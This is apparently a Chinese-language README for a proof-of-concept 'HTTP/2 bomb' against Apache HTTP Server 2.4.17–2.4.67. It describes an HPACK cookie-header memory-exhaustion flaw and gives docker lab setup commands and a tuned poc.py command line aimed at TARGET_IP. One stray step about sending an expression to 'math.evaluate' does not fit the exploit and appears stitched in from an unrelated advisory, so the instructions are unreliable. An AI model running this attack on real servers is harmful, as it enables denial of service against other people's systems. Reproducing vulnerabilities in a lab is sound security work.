
HTTP/2 Bomb
★ CVE-2026-49975 HTTP/2 炸弹 PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 是 Apache HTTP Server 中的一个 拒绝服务(DoS) 漏洞。 该漏洞出现在 HTTP/2 请求处理路径中,多个
cookie头部字段可能被合并,而未被正确计入LimitRequestFields限制。 通过发送一个经过 HPACK 编码的小型 HTTP/2 请求,该请求可扩展出大量cookie头部字段,攻击者可强制服务器在 Cookie 头部合并过程中重复分配内存。 攻击者随后可利用 HTTP/2 流控制延迟响应传输,使受影响的流保持打开状态,阻止已分配的内存被释放。
| 类别 | 版本 |
|---|---|
| 受影响 | Apache HTTP Server 2.4.17 ≤ 版本号 ≤ 2.4.67 |
| 已修复 | Apache HTTP Server 2.4.68 或更高版本 |
构建并运行存在漏洞的 Apache HTTP Server 环境。
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
启动存在漏洞的环境后,按照以下步骤重现攻击。
docker stats cve-2026-49975
输出示例:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
将以下表达式发送至 math.evaluate(例如,通过应用程序的计算输入)。
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
检查 Apache 容器的内存使用量是否增加,并在攻击流保持打开期间保持高位。